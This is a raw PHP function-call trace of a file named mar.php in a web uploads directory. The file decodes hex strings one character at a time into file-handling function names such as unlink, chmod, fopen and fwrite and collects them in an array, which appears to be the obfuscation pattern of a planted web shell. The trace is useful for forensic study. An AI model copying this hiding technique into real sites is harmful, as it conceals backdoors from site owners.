2	209	0	0.011065	520896	uhex	1		/var/www/html/uploads/mar.php	44	1	'756e6c696e6b'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	210	0	0.011096	520928	hexdec	0		/var/www/html/uploads/mar.php	540	1	'75'
3	210	1	0.011108	520976
3	210	R			117
3	211	0	0.011120	520896	chr	0		/var/www/html/uploads/mar.php	540	1	117
3	211	1	0.011132	520936
3	211	R			'u'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'u'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	212	0	0.011162	520960	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6e'
3	212	1	0.011174	521008
3	212	R			110
3	213	0	0.011186	520928	chr	0		/var/www/html/uploads/mar.php	540	1	110
3	213	1	0.011197	520968
3	213	R			'n'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'n'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	214	0	0.011228	520960	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6c'
3	214	1	0.011239	521008
3	214	R			108
3	215	0	0.011252	520928	chr	0		/var/www/html/uploads/mar.php	540	1	108
3	215	1	0.011263	520968
3	215	R			'l'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'l'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	216	0	0.011293	520960	hexdec	0		/var/www/html/uploads/mar.php	540	1	'69'
3	216	1	0.011305	521008
3	216	R			105
3	217	0	0.011317	520928	chr	0		/var/www/html/uploads/mar.php	540	1	105
3	217	1	0.011329	520968
3	217	R			'i'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'i'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	218	0	0.011359	520960	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6e'
3	218	1	0.011370	521008
3	218	R			110
3	219	0	0.011382	520928	chr	0		/var/www/html/uploads/mar.php	540	1	110
3	219	1	0.011398	520968
3	219	R			'n'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'n'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	220	0	0.011428	520960	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6b'
3	220	1	0.011440	521008
3	220	R			107
3	221	0	0.011452	520928	chr	0		/var/www/html/uploads/mar.php	540	1	107
3	221	1	0.011463	520968
3	221	R			'k'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'k'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	209	1	0.011493	520928
2	209	R			'unlink'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'unlink'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	222	0	0.011526	520928	uhex	1		/var/www/html/uploads/mar.php	44	1	'6d6b646972'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	223	0	0.011557	520960	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6d'
3	223	1	0.011569	521008
3	223	R			109
3	224	0	0.011581	520928	chr	0		/var/www/html/uploads/mar.php	540	1	109
3	224	1	0.011592	520968
3	224	R			'm'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'm'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	225	0	0.011622	520992	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6b'
3	225	1	0.011634	521040
3	225	R			107
3	226	0	0.011646	520960	chr	0		/var/www/html/uploads/mar.php	540	1	107
3	226	1	0.011657	521000
3	226	R			'k'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'k'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	227	0	0.011687	520992	hexdec	0		/var/www/html/uploads/mar.php	540	1	'64'
3	227	1	0.011699	521040
3	227	R			100
3	228	0	0.011711	520960	chr	0		/var/www/html/uploads/mar.php	540	1	100
3	228	1	0.011722	521000
3	228	R			'd'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'd'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	229	0	0.011752	520992	hexdec	0		/var/www/html/uploads/mar.php	540	1	'69'
3	229	1	0.011764	521040
3	229	R			105
3	230	0	0.011776	520960	chr	0		/var/www/html/uploads/mar.php	540	1	105
3	230	1	0.011788	521000
3	230	R			'i'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'i'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	231	0	0.011817	520992	hexdec	0		/var/www/html/uploads/mar.php	540	1	'72'
3	231	1	0.011829	521040
3	231	R			114
3	232	0	0.011842	520960	chr	0		/var/www/html/uploads/mar.php	540	1	114
3	232	1	0.011853	521000
3	232	R			'r'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'r'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	222	1	0.011883	520960
2	222	R			'mkdir'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'mkdir'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	233	0	0.011915	520960	uhex	1		/var/www/html/uploads/mar.php	44	1	'63686d6f64'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	234	0	0.011945	520992	hexdec	0		/var/www/html/uploads/mar.php	540	1	'63'
3	234	1	0.011957	521040
3	234	R			99
3	235	0	0.011969	520960	chr	0		/var/www/html/uploads/mar.php	540	1	99
3	235	1	0.011980	521000
3	235	R			'c'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'c'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	236	0	0.012010	521024	hexdec	0		/var/www/html/uploads/mar.php	540	1	'68'
3	236	1	0.012022	521072
3	236	R			104
3	237	0	0.012034	520992	chr	0		/var/www/html/uploads/mar.php	540	1	104
3	237	1	0.012045	521032
3	237	R			'h'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'h'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	238	0	0.012075	521024	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6d'
3	238	1	0.012087	521072
3	238	R			109
3	239	0	0.012099	520992	chr	0		/var/www/html/uploads/mar.php	540	1	109
3	239	1	0.012110	521032
3	239	R			'm'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'm'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	240	0	0.012143	521024	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6f'
3	240	1	0.012155	521072
3	240	R			111
3	241	0	0.012167	520992	chr	0		/var/www/html/uploads/mar.php	540	1	111
3	241	1	0.012178	521032
3	241	R			'o'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'o'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	242	0	0.012208	521024	hexdec	0		/var/www/html/uploads/mar.php	540	1	'64'
3	242	1	0.012220	521072
3	242	R			100
3	243	0	0.012232	520992	chr	0		/var/www/html/uploads/mar.php	540	1	100
3	243	1	0.012243	521032
3	243	R			'd'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'd'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	233	1	0.012272	520992
2	233	R			'chmod'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'chmod'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	244	0	0.012305	520992	uhex	1		/var/www/html/uploads/mar.php	44	1	'7363616e646972'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	245	0	0.012335	521024	hexdec	0		/var/www/html/uploads/mar.php	540	1	'73'
3	245	1	0.012347	521072
3	245	R			115
3	246	0	0.012359	520992	chr	0		/var/www/html/uploads/mar.php	540	1	115
3	246	1	0.012370	521032
3	246	R			's'
2		A						/var/www/html/uploads/mar.php	540	$n .= 's'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	247	0	0.012400	521056	hexdec	0		/var/www/html/uploads/mar.php	540	1	'63'
3	247	1	0.012412	521104
3	247	R			99
3	248	0	0.012424	521024	chr	0		/var/www/html/uploads/mar.php	540	1	99
3	248	1	0.012435	521064
3	248	R			'c'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'c'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	249	0	0.012466	521056	hexdec	0		/var/www/html/uploads/mar.php	540	1	'61'
3	249	1	0.012477	521104
3	249	R			97
3	250	0	0.012490	521024	chr	0		/var/www/html/uploads/mar.php	540	1	97
3	250	1	0.012501	521064
3	250	R			'a'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'a'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	251	0	0.012531	521056	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6e'
3	251	1	0.012542	521104
3	251	R			110
3	252	0	0.012555	521024	chr	0		/var/www/html/uploads/mar.php	540	1	110
3	252	1	0.012565	521064
3	252	R			'n'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'n'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	253	0	0.012595	521056	hexdec	0		/var/www/html/uploads/mar.php	540	1	'64'
3	253	1	0.012606	521104
3	253	R			100
3	254	0	0.012618	521024	chr	0		/var/www/html/uploads/mar.php	540	1	100
3	254	1	0.012630	521064
3	254	R			'd'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'd'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	255	0	0.012659	521056	hexdec	0		/var/www/html/uploads/mar.php	540	1	'69'
3	255	1	0.012671	521104
3	255	R			105
3	256	0	0.012683	521024	chr	0		/var/www/html/uploads/mar.php	540	1	105
3	256	1	0.012694	521064
3	256	R			'i'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'i'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	257	0	0.012724	521056	hexdec	0		/var/www/html/uploads/mar.php	540	1	'72'
3	257	1	0.012735	521104
3	257	R			114
3	258	0	0.012748	521024	chr	0		/var/www/html/uploads/mar.php	540	1	114
3	258	1	0.012759	521064
3	258	R			'r'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'r'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	244	1	0.012789	521024
2	244	R			'scandir'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'scandir'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	259	0	0.012822	521024	uhex	1		/var/www/html/uploads/mar.php	44	1	'7374725f7265706c616365'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	260	0	0.012853	521056	hexdec	0		/var/www/html/uploads/mar.php	540	1	'73'
3	260	1	0.012869	521104
3	260	R			115
3	261	0	0.012882	521024	chr	0		/var/www/html/uploads/mar.php	540	1	115
3	261	1	0.012893	521064
3	261	R			's'
2		A						/var/www/html/uploads/mar.php	540	$n .= 's'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	262	0	0.012923	521088	hexdec	0		/var/www/html/uploads/mar.php	540	1	'74'
3	262	1	0.012935	521136
3	262	R			116
3	263	0	0.012947	521056	chr	0		/var/www/html/uploads/mar.php	540	1	116
3	263	1	0.012958	521096
3	263	R			't'
2		A						/var/www/html/uploads/mar.php	540	$n .= 't'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	264	0	0.012987	521088	hexdec	0		/var/www/html/uploads/mar.php	540	1	'72'
3	264	1	0.012999	521136
3	264	R			114
3	265	0	0.013012	521056	chr	0		/var/www/html/uploads/mar.php	540	1	114
3	265	1	0.013022	521096
3	265	R			'r'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'r'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	266	0	0.013052	521088	hexdec	0		/var/www/html/uploads/mar.php	540	1	'5f'
3	266	1	0.013064	521136
3	266	R			95
3	267	0	0.013076	521056	chr	0		/var/www/html/uploads/mar.php	540	1	95
3	267	1	0.013087	521096
3	267	R			'_'
2		A						/var/www/html/uploads/mar.php	540	$n .= '_'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	268	0	0.013117	521088	hexdec	0		/var/www/html/uploads/mar.php	540	1	'72'
3	268	1	0.013129	521136
3	268	R			114
3	269	0	0.013141	521056	chr	0		/var/www/html/uploads/mar.php	540	1	114
3	269	1	0.013153	521096
3	269	R			'r'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'r'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	270	0	0.013182	521088	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	270	1	0.013194	521136
3	270	R			101
3	271	0	0.013206	521056	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	271	1	0.013217	521096
3	271	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	272	0	0.013247	521088	hexdec	0		/var/www/html/uploads/mar.php	540	1	'70'
3	272	1	0.013258	521136
3	272	R			112
3	273	0	0.013270	521056	chr	0		/var/www/html/uploads/mar.php	540	1	112
3	273	1	0.013281	521096
3	273	R			'p'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'p'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	274	0	0.013311	521088	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6c'
3	274	1	0.013323	521136
3	274	R			108
3	275	0	0.013336	521056	chr	0		/var/www/html/uploads/mar.php	540	1	108
3	275	1	0.013347	521096
3	275	R			'l'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'l'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	276	0	0.013376	521096	hexdec	0		/var/www/html/uploads/mar.php	540	1	'61'
3	276	1	0.013388	521144
3	276	R			97
3	277	0	0.013401	521064	chr	0		/var/www/html/uploads/mar.php	540	1	97
3	277	1	0.013412	521104
3	277	R			'a'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'a'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	278	0	0.013441	521096	hexdec	0		/var/www/html/uploads/mar.php	540	1	'63'
3	278	1	0.013453	521144
3	278	R			99
3	279	0	0.013465	521064	chr	0		/var/www/html/uploads/mar.php	540	1	99
3	279	1	0.013476	521104
3	279	R			'c'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'c'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	280	0	0.013506	521096	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	280	1	0.013517	521144
3	280	R			101
3	281	0	0.013530	521064	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	281	1	0.013540	521104
3	281	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	259	1	0.013570	521064
2	259	R			'str_replace'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'str_replace'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	282	0	0.013604	521064	uhex	1		/var/www/html/uploads/mar.php	44	1	'68746d6c7370656369616c6368617273'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	283	0	0.013639	521096	hexdec	0		/var/www/html/uploads/mar.php	540	1	'68'
3	283	1	0.013651	521144
3	283	R			104
3	284	0	0.013664	521064	chr	0		/var/www/html/uploads/mar.php	540	1	104
3	284	1	0.013675	521104
3	284	R			'h'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'h'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	285	0	0.013705	521128	hexdec	0		/var/www/html/uploads/mar.php	540	1	'74'
3	285	1	0.013717	521176
3	285	R			116
3	286	0	0.013729	521096	chr	0		/var/www/html/uploads/mar.php	540	1	116
3	286	1	0.013748	521136
3	286	R			't'
2		A						/var/www/html/uploads/mar.php	540	$n .= 't'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	287	0	0.013779	521128	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6d'
3	287	1	0.013791	521176
3	287	R			109
3	288	0	0.013803	521096	chr	0		/var/www/html/uploads/mar.php	540	1	109
3	288	1	0.013815	521136
3	288	R			'm'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'm'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	289	0	0.013844	521128	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6c'
3	289	1	0.013856	521176
3	289	R			108
3	290	0	0.013869	521096	chr	0		/var/www/html/uploads/mar.php	540	1	108
3	290	1	0.013880	521136
3	290	R			'l'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'l'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	291	0	0.013910	521128	hexdec	0		/var/www/html/uploads/mar.php	540	1	'73'
3	291	1	0.013922	521176
3	291	R			115
3	292	0	0.013934	521096	chr	0		/var/www/html/uploads/mar.php	540	1	115
3	292	1	0.013945	521136
3	292	R			's'
2		A						/var/www/html/uploads/mar.php	540	$n .= 's'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	293	0	0.013975	521128	hexdec	0		/var/www/html/uploads/mar.php	540	1	'70'
3	293	1	0.013986	521176
3	293	R			112
3	294	0	0.013999	521096	chr	0		/var/www/html/uploads/mar.php	540	1	112
3	294	1	0.014009	521136
3	294	R			'p'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'p'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	295	0	0.014039	521128	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	295	1	0.014050	521176
3	295	R			101
3	296	0	0.014063	521096	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	296	1	0.014074	521136
3	296	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	297	0	0.014104	521128	hexdec	0		/var/www/html/uploads/mar.php	540	1	'63'
3	297	1	0.014115	521176
3	297	R			99
3	298	0	0.014128	521096	chr	0		/var/www/html/uploads/mar.php	540	1	99
3	298	1	0.014139	521136
3	298	R			'c'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'c'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	299	0	0.014169	521136	hexdec	0		/var/www/html/uploads/mar.php	540	1	'69'
3	299	1	0.014180	521184
3	299	R			105
3	300	0	0.014193	521104	chr	0		/var/www/html/uploads/mar.php	540	1	105
3	300	1	0.014204	521144
3	300	R			'i'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'i'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	301	0	0.014233	521136	hexdec	0		/var/www/html/uploads/mar.php	540	1	'61'
3	301	1	0.014245	521184
3	301	R			97
3	302	0	0.014257	521104	chr	0		/var/www/html/uploads/mar.php	540	1	97
3	302	1	0.014268	521144
3	302	R			'a'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'a'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	303	0	0.014298	521136	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6c'
3	303	1	0.014310	521184
3	303	R			108
3	304	0	0.014322	521104	chr	0		/var/www/html/uploads/mar.php	540	1	108
3	304	1	0.014333	521144
3	304	R			'l'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'l'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	305	0	0.014367	521136	hexdec	0		/var/www/html/uploads/mar.php	540	1	'63'
3	305	1	0.014379	521184
3	305	R			99
3	306	0	0.014391	521104	chr	0		/var/www/html/uploads/mar.php	540	1	99
3	306	1	0.014402	521144
3	306	R			'c'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'c'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	307	0	0.014432	521136	hexdec	0		/var/www/html/uploads/mar.php	540	1	'68'
3	307	1	0.014444	521184
3	307	R			104
3	308	0	0.014456	521104	chr	0		/var/www/html/uploads/mar.php	540	1	104
3	308	1	0.014467	521144
3	308	R			'h'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'h'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	309	0	0.014514	521136	hexdec	0		/var/www/html/uploads/mar.php	540	1	'61'
3	309	1	0.014526	521184
3	309	R			97
3	310	0	0.014538	521104	chr	0		/var/www/html/uploads/mar.php	540	1	97
3	310	1	0.014549	521144
3	310	R			'a'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'a'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	311	0	0.014579	521136	hexdec	0		/var/www/html/uploads/mar.php	540	1	'72'
3	311	1	0.014590	521184
3	311	R			114
3	312	0	0.014603	521104	chr	0		/var/www/html/uploads/mar.php	540	1	114
3	312	1	0.014614	521144
3	312	R			'r'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'r'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	313	0	0.014644	521136	hexdec	0		/var/www/html/uploads/mar.php	540	1	'73'
3	313	1	0.014655	521184
3	313	R			115
3	314	0	0.014668	521104	chr	0		/var/www/html/uploads/mar.php	540	1	115
3	314	1	0.014679	521144
3	314	R			's'
2		A						/var/www/html/uploads/mar.php	540	$n .= 's'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	282	1	0.014708	521112
2	282	R			'htmlspecialchars'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'htmlspecialchars'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	315	0	0.014743	521112	uhex	1		/var/www/html/uploads/mar.php	44	1	'7661725f64756d70'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	316	0	0.014774	521144	hexdec	0		/var/www/html/uploads/mar.php	540	1	'76'
3	316	1	0.014785	521192
3	316	R			118
3	317	0	0.014798	521112	chr	0		/var/www/html/uploads/mar.php	540	1	118
3	317	1	0.014809	521152
3	317	R			'v'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'v'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	318	0	0.014839	521176	hexdec	0		/var/www/html/uploads/mar.php	540	1	'61'
3	318	1	0.014851	521224
3	318	R			97
3	319	0	0.014864	521144	chr	0		/var/www/html/uploads/mar.php	540	1	97
3	319	1	0.014875	521184
3	319	R			'a'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'a'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	320	0	0.014906	521176	hexdec	0		/var/www/html/uploads/mar.php	540	1	'72'
3	320	1	0.014923	521224
3	320	R			114
3	321	0	0.014942	521144	chr	0		/var/www/html/uploads/mar.php	540	1	114
3	321	1	0.014959	521184
3	321	R			'r'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'r'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	322	0	0.015000	521176	hexdec	0		/var/www/html/uploads/mar.php	540	1	'5f'
3	322	1	0.015016	521224
3	322	R			95
3	323	0	0.015033	521144	chr	0		/var/www/html/uploads/mar.php	540	1	95
3	323	1	0.015048	521184
3	323	R			'_'
2		A						/var/www/html/uploads/mar.php	540	$n .= '_'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	324	0	0.015089	521176	hexdec	0		/var/www/html/uploads/mar.php	540	1	'64'
3	324	1	0.015105	521224
3	324	R			100
3	325	0	0.015121	521144	chr	0		/var/www/html/uploads/mar.php	540	1	100
3	325	1	0.015136	521184
3	325	R			'd'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'd'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	326	0	0.015176	521176	hexdec	0		/var/www/html/uploads/mar.php	540	1	'75'
3	326	1	0.015200	521224
3	326	R			117
3	327	0	0.015217	521144	chr	0		/var/www/html/uploads/mar.php	540	1	117
3	327	1	0.015232	521184
3	327	R			'u'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'u'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	328	0	0.015272	521176	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6d'
3	328	1	0.015288	521224
3	328	R			109
3	329	0	0.015304	521144	chr	0		/var/www/html/uploads/mar.php	540	1	109
3	329	1	0.015319	521184
3	329	R			'm'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'm'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	330	0	0.015358	521176	hexdec	0		/var/www/html/uploads/mar.php	540	1	'70'
3	330	1	0.015374	521224
3	330	R			112
3	331	0	0.015390	521144	chr	0		/var/www/html/uploads/mar.php	540	1	112
3	331	1	0.015405	521184
3	331	R			'p'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'p'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	315	1	0.015445	521152
2	315	R			'var_dump'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'var_dump'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	332	0	0.015490	521792	uhex	1		/var/www/html/uploads/mar.php	44	1	'666f70656e'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	333	0	0.015531	521824	hexdec	0		/var/www/html/uploads/mar.php	540	1	'66'
3	333	1	0.015547	521872
3	333	R			102
3	334	0	0.015563	521792	chr	0		/var/www/html/uploads/mar.php	540	1	102
3	334	1	0.015577	521832
3	334	R			'f'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'f'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	335	0	0.015618	521856	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6f'
3	335	1	0.015634	521904
3	335	R			111
3	336	0	0.015650	521824	chr	0		/var/www/html/uploads/mar.php	540	1	111
3	336	1	0.015665	521864
3	336	R			'o'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'o'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	337	0	0.015705	521856	hexdec	0		/var/www/html/uploads/mar.php	540	1	'70'
3	337	1	0.015782	521904
3	337	R			112
3	338	0	0.015804	521824	chr	0		/var/www/html/uploads/mar.php	540	1	112
3	338	1	0.015820	521864
3	338	R			'p'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'p'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	339	0	0.015860	521856	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	339	1	0.015876	521904
3	339	R			101
3	340	0	0.015893	521824	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	340	1	0.015907	521864
3	340	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	341	0	0.015948	521856	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6e'
3	341	1	0.015964	521904
3	341	R			110
3	342	0	0.015980	521824	chr	0		/var/www/html/uploads/mar.php	540	1	110
3	342	1	0.015996	521864
3	342	R			'n'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'n'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	332	1	0.016035	521824
2	332	R			'fopen'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'fopen'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	343	0	0.016079	521824	uhex	1		/var/www/html/uploads/mar.php	44	1	'667772697465'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	344	0	0.016119	521856	hexdec	0		/var/www/html/uploads/mar.php	540	1	'66'
3	344	1	0.016135	521904
3	344	R			102
3	345	0	0.016151	521824	chr	0		/var/www/html/uploads/mar.php	540	1	102
3	345	1	0.016166	521864
3	345	R			'f'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'f'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	346	0	0.016206	521888	hexdec	0		/var/www/html/uploads/mar.php	540	1	'77'
3	346	1	0.016221	521936
3	346	R			119
3	347	0	0.016238	521856	chr	0		/var/www/html/uploads/mar.php	540	1	119
3	347	1	0.016260	521896
3	347	R			'w'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'w'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	348	0	0.016301	521888	hexdec	0		/var/www/html/uploads/mar.php	540	1	'72'
3	348	1	0.016317	521936
3	348	R			114
3	349	0	0.016333	521856	chr	0		/var/www/html/uploads/mar.php	540	1	114
3	349	1	0.016348	521896
3	349	R			'r'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'r'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	350	0	0.016388	521888	hexdec	0		/var/www/html/uploads/mar.php	540	1	'69'
3	350	1	0.016403	521936
3	350	R			105
3	351	0	0.016419	521856	chr	0		/var/www/html/uploads/mar.php	540	1	105
3	351	1	0.016434	521896
3	351	R			'i'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'i'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	352	0	0.016488	521888	hexdec	0		/var/www/html/uploads/mar.php	540	1	'74'
3	352	1	0.016505	521936
3	352	R			116
3	353	0	0.016522	521856	chr	0		/var/www/html/uploads/mar.php	540	1	116
3	353	1	0.016536	521896
3	353	R			't'
2		A						/var/www/html/uploads/mar.php	540	$n .= 't'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	354	0	0.016576	521888	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	354	1	0.016592	521936
3	354	R			101
3	355	0	0.016608	521856	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	355	1	0.016622	521896
3	355	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	343	1	0.016662	521856
2	343	R			'fwrite'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'fwrite'
1		A						/var/www/html/uploads/mar.php	44	$i++
